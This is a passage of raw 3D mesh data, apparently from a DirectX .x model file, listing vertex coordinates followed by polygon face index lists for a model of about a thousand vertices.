0.626690;0.629202;1.190946;, 0.641481;0.584671;1.198495;, 0.650100;0.558381;1.219956;, 0.652690;0.550288;1.235928;, 0.653532;0.545650;1.281071;, 0.652038;0.550426;1.326208;, 0.649218;0.558569;1.342164;, 0.640286;0.584924;1.363580;, 0.625393;0.629478;1.370958;, 0.610599;0.674012;1.363500;, 0.601985;0.700304;1.342035;, 0.599392;0.708396;1.326065;, 0.597862;0.715083;1.280918;, 0.507479;0.668806;1.341934;, 0.504888;0.676899;1.325963;, 0.502996;0.683477;1.280817;, 0.505538;0.676760;1.235684;, 0.508359;0.668619;1.219728;, 0.517287;0.642262;1.198313;, 0.532187;0.597704;1.190845;, 0.546978;0.553174;1.198394;, 0.555597;0.526884;1.219857;, 0.558185;0.518791;1.235827;, 0.555688;0.514521;1.280966;, 0.557533;0.518929;1.326108;, 0.554715;0.527071;1.342063;, 0.545784;0.553427;1.363481;, 0.530889;0.597980;1.370857;, 0.516095;0.642515;1.363398;, 1.418236;0.541845;-0.876496;, 1.387862;0.556449;-0.832534;, 1.417783;0.542078;0.071546;, 1.387952;0.556421;0.035556;, 1.684941;0.413612;-0.898420;, 1.684993;0.413604;0.103539;, 1.852503;0.333064;0.106714;, 1.852460;0.333069;-0.880241;, 1.489716;0.507478;-0.896044;, 1.489797;0.507455;0.090402;, 1.865683;0.326727;0.103904;, 1.865633;0.326735;-0.876211;, 1.456231;0.523577;-0.892401;, 1.426851;0.560941;0.071546;, 1.498866;0.526317;0.090402;, 1.694061;0.432466;0.103539;, 1.874752;0.345590;0.103903;, 1.874702;0.345597;-0.876212;, 1.694010;0.432475;-0.898421;, 1.498784;0.526340;-0.896045;, 1.465299;0.542440;-0.892402;, 1.427304;0.560707;-0.876497;, 1.396931;0.575312;-0.832535;, 1.397019;0.575284;0.035555;, 1.497865;0.526783;-0.814301;, 1.471716;0.539357;-0.764223;, 1.471788;0.539332;-0.041299;, 1.497478;0.526983;0.001916;, 1.559475;0.497174;0.018150;, 1.861733;0.351847;0.029007;, 1.861691;0.351854;-0.814822;, 1.559407;0.497193;-0.831130;, 1.530577;0.511055;-0.827994;, 1.857441;0.343033;-0.814825;, 1.273734;0.469643;-0.699645;, 1.218233;0.481682;-0.690121;, 1.155224;0.495349;-0.680216;, 1.105964;0.506034;-0.642752;, 1.126472;0.501588;-0.096888;, 1.177464;0.490526;-0.063916;, 1.298080;0.464364;-0.050834;, 1.889116;0.336164;0.030579;, 1.387907;0.556435;-0.398489;, 1.469917;0.539343;-0.394427;, 1.473588;0.539345;-0.411094;, 1.117001;0.504040;-0.378057;, 1.115435;0.503582;-0.361583;, 1.473588;0.399755;-0.411094;, 1.469917;0.399753;-0.394427;, 1.226964;0.536272;1.369645;, 1.221800;0.514818;1.369756;, 1.069021;0.574335;1.367007;, 1.064186;0.552735;1.367195;, 1.055581;0.565830;1.368808;, 1.272269;0.525339;1.357301;, 1.267019;0.504035;1.356925;, 1.310285;0.516134;1.333994;, 1.305144;0.494778;1.333998;, 1.336864;0.509825;1.270013;, 1.331654;0.488197;1.270015;, 1.342926;0.508198;1.177474;, 1.337841;0.486703;1.177478;, 1.336979;0.486864;1.009062;, 1.342058;0.508181;1.009044;, 1.341877;0.496951;0.997819;, 1.348319;0.495386;0.999844;, 1.352527;0.505738;1.011310;, 1.413399;0.491850;1.195992;, 1.455892;0.480710;1.452432;, 1.254714;0.530155;1.441014;, 1.070347;0.574134;1.376521;, 1.057944;0.565681;1.377168;, 1.065513;0.552534;1.376709;, 1.249551;0.508701;1.441125;, 1.450800;0.459343;1.452402;, 1.408314;0.470355;1.195996;, 1.347449;0.484421;1.011328;, 1.413702;0.467956;1.487335;, 1.399308;0.471391;1.488528;, 1.396832;0.472025;1.492715;, 1.402093;0.493334;1.493064;, 1.404558;0.492694;1.488904;, 1.418897;0.489277;1.487667;, 1.466782;0.455640;1.383895;, 1.461893;0.456784;1.387194;, 1.464796;0.456058;1.404399;, 1.469945;0.477652;1.404432;, 1.467053;0.478423;1.387224;, 1.471939;0.477271;1.383928;, 1.256419;0.527989;-0.854528;, 1.244478;0.519654;-0.851893;, 1.251318;0.506798;-0.854528;, 1.442624;0.460740;-0.905949;, 1.456670;0.468569;-0.908421;, 1.447725;0.481932;-0.905948;, 1.244932;0.519544;-1.030712;, 1.250191;0.529488;-1.031563;, 1.373297;0.499850;-1.064652;, 1.374870;0.488261;-1.065157;, 1.368196;0.478658;-1.064652;, 1.245089;0.508296;-1.031564;, 1.284997;0.521107;-1.067101;, 1.326033;0.511228;-1.078130;, 1.320931;0.490036;-1.078130;, 1.279897;0.499916;-1.067101;, 0.650417;0.524295;1.280288;, 0.191142;0.377133;1.280300;, 0.646214;0.537850;1.335964;, 0.186759;0.391264;1.335515;, 0.634728;0.574883;1.376723;, 0.174786;0.429870;1.375936;, 0.619039;0.625472;1.391642;, 0.158430;0.482607;1.390732;, 0.603347;0.676061;1.376724;, 0.142073;0.535344;1.375937;, 0.591858;0.713094;1.335966;, 0.130096;0.573950;1.335517;, 0.587655;0.726650;1.280290;, 0.125712;0.588081;1.280302;, 0.591856;0.713094;1.224614;, 0.130093;0.573950;1.225087;, 0.603341;0.676061;1.183855;, 0.142068;0.535344;1.184666;, 0.619034;0.625472;1.168936;, 0.158424;0.482607;1.169871;, 0.634723;0.574883;1.183854;, 0.174782;0.429870;1.184665;, 0.646212;0.537850;1.224613;, 0.186758;0.391264;1.225086;, 0.654265;0.551614;1.329434;, 0.657976;0.539649;1.280288;, 0.654263;0.551614;1.231143;, 0.644123;0.584303;1.195165;, 0.630274;0.628958;1.181997;, 0.616422;0.673613;1.195166;, 0.606282;0.706302;1.231144;, 0.602576;0.718268;1.280289;, 0.606286;0.706302;1.329435;, 0.616426;0.673613;1.365412;, 0.630278;0.628958;1.378580;, 0.644128;0.584303;1.365411;, 0.415971;0.660127;1.335804;, 0.436225;0.666164;1.335811;, 0.447723;0.628663;1.376476;, 0.427504;0.622504;1.376444;, 0.411778;0.673907;1.280290;, 0.432048;0.679899;1.280261;, 0.416051;0.660152;1.224775;, 0.436307;0.666189;1.224711;, 0.427645;0.622548;1.184136;, 0.447862;0.628707;1.184044;, 0.443450;0.571170;1.169260;, 0.463618;0.577497;1.169159;, 0.459235;0.519786;1.184134;, 0.479349;0.526280;1.184043;, 0.470767;0.482163;1.224774;, 0.490846;0.488779;1.224708;, 0.474960;0.468383;1.280288;, 0.495024;0.475044;1.280258;, 0.470685;0.482137;1.335802;, 0.490765;0.488753;1.335809;, 0.459095;0.519742;1.376442;, 0.479211;0.526235;1.376475;, 0.443289;0.571119;1.391318;, 0.463456;0.577446;1.391361;, 0.354741;0.641810;1.335745;, 0.373677;0.647172;1.335746;, 0.385445;0.609545;1.376370;, 0.366556;0.604027;1.376337;, 0.350450;0.655650;1.280297;, 0.369405;0.660956;1.280251;, 0.354836;0.641841;1.224849;, 0.373773;0.647203;1.224758;, 0.366722;0.604082;1.184257;, 0.385611;0.609599;1.184133;, 0.382925;0.552490;1.169400;, 0.401747;0.558219;1.169263;, 0.399101;0.500890;1.184257;, 0.417856;0.506831;1.184133;, 0.410918;0.463107;1.224848;, 0.429624;0.469204;1.224757;, 0.415206;0.449266;1.280296;, 0.433895;0.455420;1.280251;, 0.410821;0.463075;1.335745;, 0.429527;0.469172;1.335745;, 0.398935;0.500835;1.376336;, 0.417690;0.506777;1.376370;, 0.382732;0.552427;1.391194;, 0.401555;0.558156;1.391240;, 0.478764;0.679056;1.335864;, 0.512521;0.689187;1.335889;, 0.524084;0.651911;1.376594;, 0.490370;0.641645;1.376541;, 0.474515;0.692749;1.280298;, 0.508286;0.702831;1.280284;, 0.478762;0.679056;1.224733;, 0.512516;0.689187;1.224679;, 0.490364;0.641645;1.184055;, 0.524079;0.651911;1.183972;, 0.506214;0.590542;1.169166;, 0.539873;0.600991;1.169072;, 0.522065;0.539438;1.184054;, 0.555665;0.550071;1.183971;, 0.533669;0.502028;1.224731;, 0.567228;0.512795;1.224677;, 0.537918;0.488335;1.280296;, 0.571462;0.499151;1.280282;, 0.533671;0.502028;1.335862;, 0.567232;0.512795;1.335887;, 0.522069;0.539438;1.376540;, 0.555671;0.550071;1.376594;, 0.506219;0.590542;1.391429;, 0.539877;0.600991;1.391494;, 0.292819;0.623148;1.335681;, 0.312716;0.628799;1.335682;, 0.324575;0.590936;1.376255;, 0.304732;0.585121;1.376218;, 0.288496;0.637079;1.280306;, 0.308411;0.642669;1.280259;, 0.292912;0.623179;1.224932;, 0.312810;0.628830;1.224835;, 0.304892;0.585174;1.184394;, 0.324737;0.590990;1.184263;, 0.321223;0.533246;1.169556;, 0.340997;0.539288;1.169412;, 0.337528;0.481311;1.184394;, 0.357230;0.487578;1.184263;, 0.349440;0.443283;1.224931;, 0.369090;0.449715;1.224835;, 0.353765;0.429352;1.280306;, 0.373395;0.435845;1.280259;, 0.349344;0.443252;1.335681;, 0.368996;0.449685;1.335682;, 0.337366;0.481257;1.376218;, 0.357069;0.487525;1.376255;, 0.321035;0.533185;1.391056;, 0.340810;0.539227;1.391106;, 0.254401;0.611304;1.335635;, 0.266254;0.573170;1.376155;, 0.250083;0.625269;1.280284;, 0.254464;0.611324;1.224932;, 0.266363;0.573205;1.184413;, 0.282595;0.521126;1.169581;, 0.298811;0.469042;1.184412;, 0.310667;0.430907;1.224931;, 0.314981;0.416942;1.280282;, 0.310605;0.430887;1.335633;, 0.298705;0.469007;1.376154;, 0.282473;0.521086;1.390986;, 0.289254;0.424074;1.335628;, 0.246177;0.410358;1.335587;, 0.234265;0.448762;1.376051;, 0.277318;0.462307;1.376124;, 0.293644;0.410087;1.280310;, 0.250535;0.396302;1.280313;, 0.289316;0.424094;1.224993;, 0.246175;0.410358;1.225039;, 0.277423;0.462342;1.184498;, 0.234260;0.448762;1.184575;, 0.261159;0.514582;1.169676;, 0.217988;0.501223;1.169765;, 0.244878;0.566818;1.184499;, 0.201716;0.553685;1.184576;, 0.232943;0.605051;1.224994;, 0.189807;0.592090;1.225040;, 0.228549;0.619039;1.280312;, 0.185450;0.606147;1.280314;, 0.232880;0.605031;1.335629;, 0.189810;0.592090;1.335588;, 0.244771;0.566783;1.376125;, 0.201722;0.553685;1.376052;, 0.261034;0.514542;1.390947;, 0.217993;0.501223;1.390862;, 0.234454;0.570845;1.388225;, 0.221226;0.614029;1.342583;, 0.216398;0.629821;1.280299;, 0.221200;0.614022;1.218015;, 0.234407;0.570833;1.172372;, 0.252591;0.511810;1.155649;, 0.270914;0.452831;1.172371;, 0.284403;0.409726;1.218012;, 0.289362;0.393973;1.280297;, 0.284430;0.409734;1.342582;, 0.270961;0.452843;1.388224;, 0.252645;0.511825;1.404947;, 0.199301;0.607767;1.342580;, 0.212574;0.564433;1.388189;, 0.230828;0.505210;1.404900;, 0.249206;0.446026;1.388189;, 0.262722;0.402767;1.342579;, 0.267673;0.386952;1.280337;, 0.262697;0.402760;1.218096;, 0.249161;0.446013;1.172487;, 0.230773;0.505195;1.155777;, 0.212528;0.564421;1.172488;, 0.199275;0.607760;1.218099;, 0.194456;0.623614;1.280339;, 0.259461;0.625561;1.218009;, 0.254627;0.641286;1.280295;, 0.259468;0.625562;1.342581;, 0.272742;0.582530;1.388260;, 0.290968;0.523658;1.405010;, 0.309275;0.464811;1.388259;, 0.322698;0.421827;1.342579;, 0.327609;0.406125;1.280293;, 0.322691;0.421826;1.218008;, 0.309266;0.464810;1.172328;, 0.290958;0.523657;1.155578;, 0.272731;0.582529;1.172329;, 0.274546;0.647257;1.280291;, 0.279372;0.631561;1.217981;, 0.292617;0.588608;1.172284;, 0.310810;0.529846;1.155527;, 0.329082;0.471108;1.172283;, 0.342484;0.428205;1.217980;, 0.347392;0.412533;1.280289;, 0.342491;0.428205;1.342598;, 0.329092;0.471110;1.388295;, 0.310822;0.529848;1.405053;, 0.292625;0.588610;1.388296;, 0.279377;0.631561;1.342600;, 0.319847;0.643778;1.217960;, 0.315046;0.659394;1.280282;, 0.319853;0.643779;1.342603;, 0.333045;0.601007;1.388350;, 0.351180;0.542437;1.405141;, 0.369396;0.483892;1.388349;, 0.382740;0.441169;1.342601;, 0.387619;0.425577;1.280280;, 0.382734;0.441168;1.217958;, 0.369385;0.483891;1.172211;, 0.351168;0.542435;1.155421;, 0.333034;0.601006;1.172212;, 0.335638;0.665565;1.280276;, 0.340429;0.649980;1.217929;, 0.353589;0.607293;1.172163;, 0.371687;0.548840;1.155365;, 0.389869;0.490411;1.172163;, 0.403192;0.447774;1.217928;, 0.408068;0.432214;1.280274;, 0.403199;0.447775;1.342622;, 0.389879;0.490413;1.388387;, 0.371700;0.548841;1.405186;, 0.353600;0.607295;1.388388;, 0.340435;0.649981;1.342624;, 0.381598;0.662405;1.217912;, 0.376823;0.677914;1.280271;, 0.381602;0.662405;1.342630;, 0.394718;0.619890;1.388442;, 0.412756;0.561615;1.405271;, 0.430861;0.503361;1.388441;, 0.444106;0.460886;1.342628;, 0.448944;0.445397;1.280269;, 0.444103;0.460886;1.217910;, 0.430856;0.503361;1.172098;, 0.412751;0.561615;1.155269;, 0.394711;0.619890;1.172099;, 0.397433;0.684096;1.280270;, 0.402198;0.668613;1.217891;, 0.415291;0.626168;1.172063;, 0.433299;0.567989;1.155227;, 0.451375;0.509830;1.172062;, 0.464600;0.467426;1.217889;, 0.469433;0.451962;1.280268;, 0.464602;0.467426;1.342648;, 0.451380;0.509830;1.388476;, 0.433306;0.567989;1.405312;, 0.415297;0.626168;1.388477;, 0.402202;0.668613;1.342650;, 0.442561;0.680791;1.217885;, 0.437808;0.696213;1.280274;, 0.442561;0.680790;1.342662;, 0.455618;0.638480;1.388526;, 0.473578;0.580441;1.405387;, 0.491590;0.522417;1.388525;, 0.504749;0.480139;1.342661;, 0.509552;0.464732;1.280272;, 0.504749;0.480140;1.217883;, 0.491590;0.522419;1.172019;, 0.473578;0.580442;1.155159;, 0.455617;0.638482;1.172020;, 0.457588;0.702153;1.280278;, 0.462336;0.686750;1.217874;, 0.475377;0.644492;1.171998;, 0.493314;0.586524;1.155132;, 0.511303;0.528572;1.171997;, 0.524446;0.486345;1.217872;, 0.529243;0.470957;1.280276;, 0.524446;0.486345;1.342680;, 0.511304;0.528571;1.388556;, 0.493316;0.586523;1.405422;, 0.475378;0.644491;1.388557;, 0.462336;0.686749;1.342682;, -1.126290;0.909123;0.686369;, -1.163382;0.832975;0.690262;, -1.237833;0.793289;0.698731;, -1.321205;0.805225;0.708539;, -1.381652;0.864223;0.715942;, -1.396087;0.947747;0.718111;, -1.358995;1.023895;0.714217;, -1.284544;1.063580;0.705749;, -1.201174;1.051644;0.695941;, -1.140726;0.992647;0.688538;, -1.107518;0.908196;0.847147;, -1.144506;0.832049;0.851912;, -1.218470;0.792343;0.864484;, -1.301160;0.804245;0.880062;, -1.360993;0.863208;0.892695;, -1.375113;0.946710;0.897558;, -1.338125;1.022857;0.892793;, -1.264161;1.062563;0.880221;, -1.181469;1.050662;0.864643;, -1.121637;0.991699;0.852010;, -0.962041;0.887935;1.059004;, -0.983554;0.805452;1.085089;, -1.014771;0.757163;1.153439;, -1.038844;0.753757;1.245451;, -1.055355;0.811916;1.317342;, -1.051585;0.901445;1.344825;, -1.028967;0.988148;1.317399;, -0.996145;1.038908;1.245543;, -0.965657;1.034335;1.156706;, -0.958448;0.973105;1.085142;, -0.277395;0.741776;1.156229;, -0.269047;0.830520;1.127395;, -0.265634;0.919584;1.156248;, -0.268454;0.974948;1.231769;, -0.276437;0.975466;1.325111;, -0.286527;0.920939;1.400619;, -0.294874;0.832195;1.429453;, -0.298290;0.743132;1.400599;, -0.295467;0.687767;1.325079;, -0.287487;0.687249;1.231738;, -0.396156;0.838779;1.424568;, -0.435730;0.841353;1.422685;, -0.427394;0.930105;1.393984;, -0.387819;0.927530;1.395847;, -0.399578;0.749722;1.395780;, -0.439151;0.752297;1.393910;, -0.396774;0.694377;1.320486;, -0.436350;0.696955;1.318656;, -0.388820;0.693884;1.227457;, -0.428399;0.696467;1.225684;, -0.378752;0.748432;1.152229;, -0.418334;0.751018;1.150507;, -0.370416;0.837184;1.123525;, -0.409997;0.839772;1.121827;, -0.366995;0.926239;1.152299;, -0.406575;0.928826;1.150586;, -0.369795;0.981583;1.227567;, -0.409374;0.984165;1.225809;, -0.377750;0.982075;1.320595;, -0.417326;0.984654;1.318780;, -0.575933;0.850464;1.415898;, -0.615506;0.853038;1.414015;, -0.607181;0.941799;1.385453;, -0.567605;0.939224;1.387311;, -0.579359;0.761416;1.387189;, -0.618933;0.763991;1.385321;, -0.576576;0.706093;1.312164;, -0.616154;0.708672;1.310345;, -0.568651;0.705630;1.219507;, -0.608232;0.708214;1.217759;, -0.558611;0.760203;1.144614;, -0.598193;0.762792;1.142931;, -0.550287;0.848965;1.116066;, -0.589871;0.851557;1.114413;, -0.546857;0.938011;1.144744;, -0.586442;0.940600;1.143072;, -0.549635;0.993329;1.219712;, -0.589215;0.995914;1.217982;, -0.557559;0.993792;1.312365;, -0.597138;0.996372;1.310564;, -0.558644;0.754750;1.137186;, -0.569096;0.696844;1.216654;, -0.577274;0.697320;1.315003;, -0.580054;0.755992;1.394607;, -0.576364;0.850397;1.425051;, -0.567604;0.944503;1.394735;, -0.557125;1.002399;1.315216;, -0.548944;1.001922;1.216870;, -0.546196;0.943254;1.137323;, -0.549903;0.848857;1.106912;, -0.608676;0.699429;1.214906;, -0.598228;0.757339;1.135503;, -0.589488;0.851448;1.105259;, -0.585778;0.945843;1.135652;, -0.588526;1.004507;1.215141;, -0.596704;1.004979;1.313414;, -0.607178;0.947078;1.392877;, -0.615938;0.852970;1.423168;, -0.619630;0.758568;1.392738;, -0.616853;0.699899;1.313185;, -0.389261;0.685094;1.224615;, -0.397472;0.685602;1.323320;, -0.400275;0.744290;1.403191;, -0.396589;0.838714;1.433721;, -0.387818;0.932822;1.403261;, -0.377316;0.990686;1.323435;, -0.369104;0.990178;1.224731;, -0.366325;0.931491;1.144886;, -0.370023;0.837072;1.114371;, -0.378780;0.742963;1.144812;, -0.437049;0.688181;1.321491;, -0.428839;0.687677;1.222843;, -0.418361;0.745550;1.143090;, -0.409605;0.839660;1.112673;, -0.405906;0.934078;1.143173;, -0.408682;0.992761;1.222973;, -0.416893;0.993265;1.321619;, -0.427393;0.935397;1.401399;, -0.436164;0.841288;1.431838;, -0.439850;0.746865;1.401321;, -1.221491;1.010388;1.181044;, -1.236210;1.012543;1.163016;, -1.177213;1.055974;1.117666;, -1.161531;1.054362;1.134187;, -1.254668;0.929336;1.198506;, -1.269711;0.931546;1.180184;, -1.245865;0.842640;1.179078;, -1.260601;0.844801;1.161003;, -1.200765;0.784538;1.131076;, -1.216096;0.787352;1.114341;, -1.133186;0.773633;1.071404;, -1.147719;0.775081;1.055532;, -1.069239;0.817160;1.022894;, -1.080844;0.818840;1.006827;, -1.034411;0.899435;1.005378;, -1.045623;0.901111;0.989492;, -1.044293;0.987915;1.024741;, -1.056863;0.991394;1.009028;, -1.093376;1.046901;1.074474;, -1.108027;1.049794;1.058974;, -1.131629;1.052143;1.003933;, -1.122736;1.050265;1.021863;, -1.199201;1.060963;1.069542;, -1.208912;1.061852;1.051353;, -1.074457;0.989937;0.965031;, -1.068079;0.989706;0.983089;, -1.062867;0.902564;0.950434;, -1.056358;0.901930;0.968213;, -1.099014;0.822204;0.965170;, -1.092512;0.821060;0.983053;, -1.171635;0.779062;1.004164;, -1.162263;0.778383;1.021823;, -1.248442;0.792002;1.051580;, -1.238668;0.789856;1.069518;, -1.300997;0.851882;1.089384;, -1.292675;0.850485;1.107935;, -1.312538;0.939248;1.103972;, -1.304132;0.937808;1.122704;, -1.276432;1.019614;1.089243;, -1.268236;1.018236;1.107950;, -1.062046;1.041427;1.100284;, -1.043410;1.038480;1.113119;, -1.094387;1.046019;1.187251;, -1.114558;1.048726;1.173558;, -1.026784;0.983712;1.040733;, -1.009842;0.980562;1.053359;, -1.022462;0.897061;1.017774;, -1.006431;0.894376;1.030680;, -1.051172;0.815057;1.040594;, -1.034373;0.812826;1.053587;, -1.101455;0.769598;1.100185;, -1.083094;0.767076;1.113478;, -1.153947;0.777536;1.173547;, -1.134068;0.774614;1.187604;, -1.188717;0.835425;1.232738;, -1.167779;0.832553;1.247591;, -1.192775;0.921678;1.255424;, -1.171296;0.918755;1.270434;, -1.164332;1.003179;1.232718;, -1.143254;1.000291;1.247374;, -0.753710;1.007067;1.297641;, -0.734804;1.005829;1.299179;, -0.751355;0.951897;1.374006;, -0.770262;0.953133;1.372432;, -0.737736;1.005817;1.205339;, -0.718832;1.004575;1.206831;, -0.728441;0.949860;1.130781;, -0.709537;0.948615;1.132232;, -0.729375;0.860569;1.102446;, -0.710471;0.859324;1.103884;, -0.740181;0.772052;1.131157;, -0.721277;0.770807;1.132616;, -0.756733;0.718117;1.205947;, -0.737827;0.716876;1.207450;, -0.772708;0.719367;1.298250;, -0.753801;0.718129;1.299799;, -0.782003;0.775324;1.372808;, -0.763096;0.774089;1.374389;, -0.781069;0.864615;1.401143;, -0.762162;0.863380;1.402733;, -0.737270;1.011367;1.203662;, -0.753511;1.012642;1.299295;, -0.770416;0.956769;1.376775;, -0.781517;0.865105;1.406514;, -0.782571;0.772651;1.377165;, -0.773180;0.714716;1.299925;, -0.756939;0.713441;1.204293;, -0.740056;0.769315;1.126811;, -0.728967;0.860980;1.097072;, -0.727901;0.953431;1.126422;, -0.734604;1.011404;1.300833;, -0.718365;1.010125;1.205153;, -0.708996;0.952187;1.127873;, -0.710063;0.859734;1.098510;, -0.721151;0.768071;1.128270;, -0.738032;0.712200;1.205796;, -0.754274;0.713478;1.301474;, -0.763664;0.771416;1.378746;, -0.762609;0.863871;1.408104;, -0.751509;0.955534;1.378350;, -1.059147;1.046335;1.100046;, -1.112887;1.053894;1.176366;, -1.163996;1.006680;1.238093;, -1.193261;0.922236;1.261823;, -1.189255;0.832909;1.238197;, -1.153687;0.772990;1.176486;, -1.099940;0.764895;1.100075;, -1.048353;0.812024;1.038033;, -1.018816;0.896936;1.014231;, -1.023119;0.986617;1.038097;, -1.098089;1.051920;1.186555;, -1.044422;1.043992;1.110307;, -1.008855;0.983920;1.048865;, -1.004976;0.894593;1.025554;, -1.034230;0.810161;1.049113;, -1.085467;0.762915;1.110696;, -1.139136;0.770849;1.186936;, -1.174748;0.830928;1.248680;, -1.178673;0.920262;1.272209;, -1.149371;1.004685;1.248447;, -1.163886;1.059979;1.133772;, -1.092727;1.052259;1.072653;, -1.041277;0.991150;1.021692;, -1.030749;0.899398;1.001854;, -1.067097;0.814150;1.019748;, -1.133933;0.769190;1.069376;, -1.204462;0.780596;1.130475;, -1.251624;0.840776;1.179622;, -1.260964;0.930590;1.199547;, -1.226406;1.014513;1.181708;, -1.105589;1.054921;1.059598;, -1.176887;1.061178;1.120652;, -1.237659;1.016167;1.167828;, -1.272264;0.932259;1.185671;, -1.262892;0.842437;1.165695;, -1.217094;0.783041;1.117133;, -1.146668;0.770352;1.055933;, -1.077547;0.815661;1.005293;, -1.041078;0.900950;0.987278;, -1.052731;0.994532;1.007609;, -1.279698;1.023582;1.090924;, -1.317159;0.940356;1.106006;, -1.305146;0.849862;1.091054;, -1.250553;0.787821;1.052248;, -1.170908;0.774442;1.003569;, -1.095601;0.819066;0.963691;, -1.058059;0.902294;0.948691;, -1.070170;0.992816;0.963543;, -1.129488;1.057206;1.003336;, -1.209609;1.067306;1.052030;, -1.310089;0.939159;1.122504;, -1.272748;1.022425;1.107490;, -1.200753;1.066611;1.068349;, -1.121167;1.055346;1.019825;, -1.064228;0.992519;0.980592;, -1.051967;0.901691;0.965643;, -1.089552;0.818008;0.980650;, -1.162103;0.773892;1.019919;, -1.241656;0.785772;1.068445;, -1.298071;0.848685;1.107542;, -1.111231;0.908380;0.815365;, -1.148320;0.832238;0.819257;, -1.222764;0.792556;0.827725;, -1.306129;0.804491;0.837533;, -1.366572;0.863484;0.844935;, -1.381007;0.947002;0.847103;, -1.343918;1.023144;0.843211;, -1.269473;1.062826;0.834743;, -1.186107;1.050891;0.824935;, -1.125665;0.991898;0.817533;, -1.107598;0.907753;0.767094;, -1.123007;0.996913;0.769409;, -1.187532;1.059891;0.777311;, -1.276531;1.072633;0.787782;, -1.356004;1.030270;0.796821;, -1.395598;0.948984;0.800977;, -1.380189;0.859824;0.798662;, -1.315662;0.796845;0.790760;, -1.226665;0.784104;0.780290;, -1.147191;0.826467;0.771250;, -1.117492;0.996640;0.816611;, -1.102084;0.907480;0.814296;, -1.141678;0.826195;0.818451;, -1.221151;0.783832;0.827491;, -1.310149;0.796573;0.837961;, -1.374675;0.859551;0.845863;, -1.390083;0.948711;0.848179;, -1.350489;1.029997;0.844023;, -1.271015;1.072360;0.834983;, -1.182019;1.059619;0.824513;, -1.107071;0.936353;0.815045;, -1.108881;0.946825;0.815317;, -1.110773;0.957777;0.815601;, -1.112585;0.968249;0.815873;, -1.118099;0.968521;0.768672;, -1.116289;0.958050;0.768400;, -1.114396;0.947098;0.768115;, -1.112586;0.936626;0.767844;, -1.086890;0.972767;0.812897;, -1.085079;0.962295;0.812625;, -1.090594;0.962568;0.765424;, -1.092403;0.973039;0.765696;, -1.083187;0.951343;0.812341;, -1.081378;0.940872;0.812069;, -1.086892;0.941144;0.764868;, -1.088702;0.951616;0.765140;, -1.075239;0.964264;0.802330;, -1.078643;0.964432;0.773193;, -1.080453;0.974903;0.773465;, -1.077048;0.974735;0.802602;, -1.071535;0.942840;0.801774;, -1.074941;0.943009;0.772637;, -1.076750;0.953480;0.772909;, -1.073346;0.953312;0.802046;, -1.117138;0.908223;0.685300;, -1.156736;0.826927;0.689456;, -1.236218;0.784560;0.698497;, -1.325225;0.797302;0.708968;, -1.389759;0.860288;0.716871;, -1.405170;0.949458;0.719186;, -1.365570;1.030752;0.715030;, -1.286089;1.073119;0.705990;, -1.197082;1.060377;0.695518;, -1.132548;0.997392;0.687615;, -1.069697;0.983942;0.782090;, -1.057331;0.930023;0.778303;, -1.073978;0.982419;0.789795;, -1.061613;0.928500;0.786008;, -1.082698;0.980423;0.789748;, -1.070332;0.926504;0.785961;, -1.087136;0.979950;0.781996;, -1.074770;0.926031;0.778209;, -1.082854;0.981472;0.774292;, -1.070489;0.927554;0.770504;, -1.074136;0.983469;0.774339;, -1.061770;0.929550;0.770551;; 1033; 4;1044,710,709,1043;, 4;1043,709,708,1042;, 10;711,702,703,704,705,706,707,708,709,710;, 4;1045,711,710,1044;, 4;1036,702,711,1045;, 4;1037,703,702,1036;, 4;1038,704,703,1037;, 4;1039,705,704,1038;, 4;1040,706,705,1039;, 4;1041,707,706,1040;, 4;1042,708,707,1041;, 4;992,1019,1012,1003;, 4;992,1003,1004,1001;, 4;1036,992,1001,1037;, 4;992,1036,1018,1019;, 5;1016,1018,1036,1045,993;, 3;1017,1018,1016;, 4;1018,1017,1014,1013;, 4;993,1002,1015,1016;, 4;994,1011,1002,993;, 4;1044,994,993,1045;, 4;1043,995,994,1044;, 4;995,1010,1011,994;, 4;996,1009,1010,995;, 4;1042,996,995,1043;, 4;1041,997,996,1042;, 4;997,1008,1009,996;, 4;998,1007,1008,997;, 4;1040,998,997,1041;, 4;1039,999,998,1040;, 4;999,1006,1007,998;, 4;1000,1005,1006,999;, 4;1038,1000,999,1039;, 4;1037,1001,1000,1038;, 4;1001,1004,1005,1000;, 4;1035,1024,1025,1032;, 4;1024,1013,1012,1025;, 4;1012,1013,982,1003;, 4;1003,982,983,1004;, 4;1004,983,984,1005;, 4;1005,984,985,1006;, 4;1006,985,986,1007;, 4;1007,986,987,1008;, 4;1008,987,988,1009;, 4;1009,988,989,1010;, 4;1010,989,990,1011;, 4;1011,990,991,1002;, 3;991,1015,1002;, 4;1015,991,982,1013;, 3;1014,1015,1013;, 4;1020,1015,1014,1021;, 4;1031,1020,1021,1028;, 4;848,712,721,846;, 4;850,713,712,848;, 4;852,714,713,850;, 4;714,984,983,713;, 4;713,983,982,712;, 4;712,982,991,721;, 4;721,991,990,720;, 4;846,721,720,842;, 4;842,720,719,845;, 4;720,990,989,719;, 4;719,989,988,718;, 4;845,719,718,860;, 4;860,718,717,858;, 4;858,717,716,856;, 4;856,716,715,854;, 4;716,986,985,715;, 4;717,987,986,716;, 4;718,988,987,717;, 4;715,985,984,714;, 4;854,715,714,852;, 4;970,842,845,971;, 4;971,845,860,962;, 4;962,860,858,963;, 4;963,858,856,964;, 4;964,856,854,965;, 4;965,854,852,966;, 4;966,852,850,967;, 4;967,850,848,968;, 4;968,848,846,969;, 4;969,846,842,970;, 4;971,974,975,970;, 4;962,973,974,971;, 4;963,972,973,962;, 4;964,981,972,963;, 4;965,980,981,964;, 4;966,979,980,965;, 4;967,978,979,966;, 4;968,977,978,967;, 4;969,976,977,968;, 4;970,975,976,969;, 4;974,844,843,975;, 4;973,861,844,974;, 4;972,859,861,973;, 4;981,857,859,972;, 4;980,855,857,981;, 4;979,853,855,980;, 4;978,851,853,979;, 4;977,849,851,978;, 4;976,847,849,977;, 4;975,843,847,976;, 4;841,843,844,824;, 4;824,844,861,823;, 4;823,861,859,827;, 4;827,859,857,829;, 4;829,857,855,831;, 4;831,855,853,833;, 4;833,853,851,835;, 4;835,851,849,837;, 4;837,849,847,839;, 4;839,847,843,841;, 4;952,841,824,953;, 4;953,824,823,954;, 4;954,823,827,955;, 4;955,827,829,956;, 4;956,829,831,957;, 4;957,831,833,958;, 4;958,833,835,959;, 4;959,835,837,960;, 4;960,837,839,961;, 4;961,839,841,952;, 4;943,952,953,942;, 4;942,953,954,951;, 4;951,954,955,950;, 4;950,955,956,949;, 4;949,956,957,948;, 4;948,957,958,947;, 4;947,958,959,946;, 4;946,959,960,945;, 4;945,960,961,944;, 4;944,961,952,943;, 